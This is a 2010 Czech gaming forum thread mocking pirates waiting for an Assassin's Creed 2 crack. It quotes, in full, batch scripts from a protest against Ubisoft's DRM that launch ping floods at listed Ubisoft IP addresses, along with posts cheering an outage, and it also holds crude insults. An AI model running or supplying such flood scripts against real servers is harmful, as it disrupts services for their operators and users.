LOL WUT

Diskuse o všem, co se nehodí do žádné jiné kategorie

Moderátor: Moderátoři Doupě.cz

Odeslat příspěvekod Dr.Watson 13. 3. 2010 11:25

Tak ono to souvisí s přístupem k netu a všeobecnou kulturou vůbec. Ať jde o běžná fora, nebo warfora, nebo torrenty. Napsat pár písmen umí kdejaký dement, ohlídat myšlenku, slovosled a gramatiku je horší...
Nakonec, kdo dneska čte povinnou četbu? Počítám, že minimum, většinou se to najde hotové na netu, maximálně si někdo přečte ty "ultra výtahy" aka Shakespeare komplet na 50-ti stránkách :D Podle mne se čeština, vyjadřování jinak nastudovat nedá jedině čtením kvalitních textů.
Dr.Watson
Killing Spree
Uživatelský avatar

Odeslat příspěvekod inexplicit 13. 3. 2010 14:08

na warcenteru opet zabava =) jeden z uzivatelu si dal praci a napsal toto :

Tak abych shrnul všechny důležité a relevantní informace z cirka posledních 20-ti stránek této diskuze, pro ty jenž nemají čas vyhledávat si vlastní zaručené informace.

1) Na internetu je spousta funkčních cracků na AC2, ty opravdu kvalitní se dají najít na ruských placených stránkách. Většina z nich se tváří jako cracky na jiné hry, ale věřte že je to jen kamufláž.

2) Razor1911 na tiskové konferenci konané ve Washington square garden vyhlásil čas vydání cracku na zítřek. Uvedl však, že datum bodu od kterého se označení zítřek odvozuje, není pevné.

3) Razor1911 zatelefonoval jednomu z kamarádů uživatele tohoto fóra, že předchozí zpráva je zavádějící a na žádném cracku nepracuje. Následně si to ale asi rozmyslel, protože pod různými variantami přezdívek jako razor1911team, či razor1911group obesílá každý druhý internetový blog a uživatele ujišťuje, že crack vyjde dle bod 2.

4) Touha českých fanoušků po cracku je neúnosná a vyznačuje se hlavně pokládáním otázky: Už vyšel crack? - v intervalu zhruba 4x za hodinu. Dalším oblíbeným rysem chování je pak předkládání toho samého cracku pořád dokola, doprovázené otázkou: Je tohle funkční crack? 6x za hodinu.

5) Uživatel A říká, že uživatel B je hovado. Uživatel B logicky kontruje, že matka uživatele A žere výkaly a souloží s celou ulicí. Nestraný uživatel C uživatele A a B označuje za kripli a hovata, kterým není více jak třináct let. Uživatelé A a B tyto informace nepopírají, ale naznačují, že v tomto případě musí brát v ohled fakt, že uživateli C není ani deset let a že by měl jít spát.

6) Dle vysoce sofistikovaného vyjádření přítelkyně jednoho z uživatelů, jenž se pohybuje na poli psychologie, je jeden z místních moderátorů sebestředné pako jemuž moc leze na mozek. Výše zmíněná premisa se neshledává s úspěchem mezi průměrným obyvatelstvem. Dav linčuje autora výroku.

7) Do práce na vyřešení problému jenž zamotal hlavu všem velkým pirátským grupám se pouští geniální dítě z české republiky základoškolního věku. Je si jisté úspěchem - jen musí sehnat někoho s originální hrou - to se nedaří a vlastní kapitál na zmíněné nestačí - vývoj cracku je pozastaven.

8/ Dle nejnovějších informací se vzhledem k faktu, že AC3 vyjde za měsíc a bude obdařen galaktickou ochranou třetí generace, pozastavuje jakákoli snaha cracknout AC2, jenž je obdařen druhou generací (stejně nepřekonatelnou). Razor1911 pláče z vzdává se všech svých ambic na poli počítačové kriminality... jde si do obchodu koupit několik originálních her.


jsem sokovan, ze tam nekdo aj umi psat :D
inexplicit
Rampage

Odeslat příspěvekod mouriso 13. 3. 2010 14:54

Razor1911 pláče z vzdává se všech svých ambic na poli počítačové kriminality... jde si do obchodu koupit několik originálních her.

tohle me malem zabilo xD
"Indeed" - Teal'c(Stargate)
mouriso
First Blood
Uživatelský avatar

Odeslat příspěvekod Sasakr 13. 3. 2010 15:44

To nemá chybu :tleskani :lol:
"Svoboda je věc, která akorát ruší." Tdjohn
Sasakr
Sleepwalker
Uživatelský avatar

Odeslat příspěvekod mtmccox2 13. 3. 2010 16:05

Super! :-D
Jesus Christ made changes to your life. Do you want to save it?

|Yes||No|
mtmccox2
Killing Spree
Uživatelský avatar

Odeslat příspěvekod DevAstor 13. 3. 2010 20:26

:lol: :lol: :lol: Tak to mě tak pobavilo, že jsem to uwarezil na blog: http://blog.blog.zive.cz/2010/03/warez- ... eho-sveta/
Toto je můj osobní názor.

    (\_/)
    (°.°)           <=(čert s dvouma půllitrama)
   c(”)(”)
DevAstor
Rampage
Uživatelský avatar

Odeslat příspěvekod inexplicit 13. 3. 2010 20:35

* psychujou = chovají se vypjatě :D :D :D se z tebe asi porezu :D
inexplicit
Rampage

Odeslat příspěvekod -Dreamer- 13. 3. 2010 21:14

Není to sice příspěvek tématický příbuzný většině v tomto vláknu, ale když jsem na to koukal, byl jsem LOLWUT, takže co. :D

Let me tell you of the days of high adventure! Let me tell you the tale of the last child of Bhaal, the one that went against the prophecy!
http://dreamer.blog.doupe.cz/
-Dreamer-
Dominating
Uživatelský avatar

Odeslat příspěvekod N.Marko 13. 3. 2010 21:39

Dokonalé :D
Ta neurotická snaha být normální nás přivádí k šílenství. -Solomon Short
To že jsi paranoidní neznamená, že nemáš pravdu.
Jsem pro aby se udržovaly nebezpečné zbraně mimo dosah bláznů. Můžeme začít třeba s psacími stroji. -Solomom Short
N.Marko
Godlike
Uživatelský avatar

Odeslat příspěvekod inexplicit 13. 3. 2010 21:47

facebookaaari doporucuju projet ty fotky :D nema cenu sem davat vsechny :D

http://www.facebook.com/photo.php?pid=1 ... 9579372633
inexplicit
Rampage

Odeslat příspěvekod mtmccox2 13. 3. 2010 23:09

FUCK YEEAAH :mrgreen: Obrázek
Jesus Christ made changes to your life. Do you want to save it?

|Yes||No|
mtmccox2
Killing Spree
Uživatelský avatar

Odeslat příspěvekod inexplicit 14. 3. 2010 10:42

tak jen doplnim k nedavnemu tematu ..

AC2 zazilo v noci nemaly poprask..protoze warezakum se plne rozjelo ..jelikoz UBI servery byly vyhozeny ..udajne kvuli tomuhle:


na nfohumpu píše:#The network was a massive protest against the DRM protection from UbiSoft.
#
#This new method of digital rights management, which requires a complete game for #the availability of a permanent Internet connection.
#
#DRM does no longer start the game and record the checkpoint passage in case of #absence or break the Internet connection.
#
#Games that already have this mechanism: Assassin's Creed 2 and Silent Hunter 5.
#
#Join the protest!
#
#Remember Only Moscow Time! 15:00, 18:00, 20:00, 22:00, 00:00 <<<Today 13 Th Of #March! Change Local Time To Moscow...
################################################################################

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+No Virus! Here See Yourself >> http://bayimg.com/caLACaaCD+
+ +
+If You Want You Can Make .Bat File With Code By Yourself!+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

@echo off
@echo Dos Attack Time! 15:00, 18:00, 20:00, 22:00, 00:00 "Moscow Time"
@echo If We Dos Ubisoft System Servers From All Around The World,Their Servers Will Go Down Because Of Overload!
@echo WebXakep.net DRM OFF, To Start Click Anything!
pause
start ping 216.98.48.35 -t -l 1024
start ping 63.251.9.26 -t -l 1024


..

za par minut :

Ludia mne ten crack nejde. Dopč a jak som sa tešil že vám to ide .... Neviete prečo mi to nejde .. normal nakopčím tie subory launcheru .. ale aj tak mi to nejde ... white screeen pri animuse ...


>>

CRACK Z EDISKU UŽ NEJDE, PROTOŽE UBI SERVERY JSOU OPĚT NAHOZENY, PŘESTAŇTE SE TAK BLBĚ PTÁT DO *****.


:mrgreen: :mrgreen: ...takze warezpeople dostali ochutnat lizatka a po par minutach jim bylo opet odebrano :D

....

kazdopadne boj porad pokracoval :

Něco se chystá, vytvořte textový dokument s libovolným názvem a do něj vložte
Citace:
@echo off
@echo Zapystute etot fail v 15:00, 18:00, 20:00, 22:00, 00:00 po Moscwe
@echo WebXakep.net DRM OFF, for start press any button
pause
start ping 63.251.9.26 -t -l 1024
start ping 92.52.125.20 -t -l 1024
start ping 216.98.48.35 -t -l 1024
start ping 216.98.48.40 -t -l 1024
start ping 216.98.51.199 -t -l 1024
start ping 216.98.51.201 -t -l 1024
start ping 216.98.51.202 -t -l 1024
start ping 216.98.51.203 -t -l 1024
start ping 216.98.51.204 -t -l 1024
start ping 216.98.51.205 -t -l 1024


Uložte, změnte koncovku na .bat a čekejte na 2:00 Moskevského času, což je za chvíli


moc se v tom nevyznam, ale vypada to DoS utok na ubi servery


Celej den je ubisfot pod útokem díky tomu xD Forum nejde, ale servery pro hraní přesunuli na jinou IP ***** xD


nasledne:

tak , doufam že už jim to nikdy nepojede

http://s1.imgupload.cz/img/233161/8fc1x/hacj.jpg


DesperadosCZ napsal:
Už jim hezky stoupá odezva z serverů


kežby by jím to nešlo nebo by se tak stalo tak by museli vydat patch a hra by šla hrát offline


>

IP 92.52.125.20 DEAD, POVEDLO SE!!!


jen kdyby někdo nevěděl o co se jedná stěma útokama tak je to běžný paket na otestování odezvy s největší možnou velikostí kdyby se někdo bál viru tak to neni ale v některých zemích je tenhle typ útoků protizákoný ale o český republice sem se nic nedočet tak jen do nich :-)


Jo UBI to přesměrovalo musí se to vystopovat kam a zaútočit znovu xD


-------------------------------------


nakonec nikomu stazena hra opet nejde
..na xzone diskuzi si par lidi stezovalo ze jim to nejde...a par lidi s originalem zas rikalo ze jim jede i kdyz servery nebezely...

no proste LOL =)
inexplicit
Rampage

Odeslat příspěvekod kurcatovium 14. 3. 2010 10:54

Jak vidno chronický pirát je naprostý debil.
kurcatovium
Dominating
Uživatelský avatar

Odeslat příspěvekod SCobra 14. 3. 2010 10:59

Kretenismus :D Však ten DDoS útok nemůže fungovat... Firewall všechny ping packety na standardním portu určitě zahazuje :D A hra určitě neběží na portu 135 ani 80.
Od konce 90. let jsem kromě aktuální generace konzolí hrál skoro na všem, na co si vzpomenete, ale teď už hraju v podstatě jen na PC nebo s dětmi na N. Switch.
SCobra
Godlike
Uživatelský avatar

Odeslat příspěvekod Majorus 14. 3. 2010 11:03

Lolci prostě no...
Můj Twitter-> Majorus_hw

Můj web se skrývá na ikonce planetky, pod avatarem ;)
Majorus
Unstoppable
Uživatelský avatar

Předchozí stránkaDalší stránka

Kdo je online

Uživatelé procházející toto fórum: Žádní registrovaní uživatelé a 0 návštevníků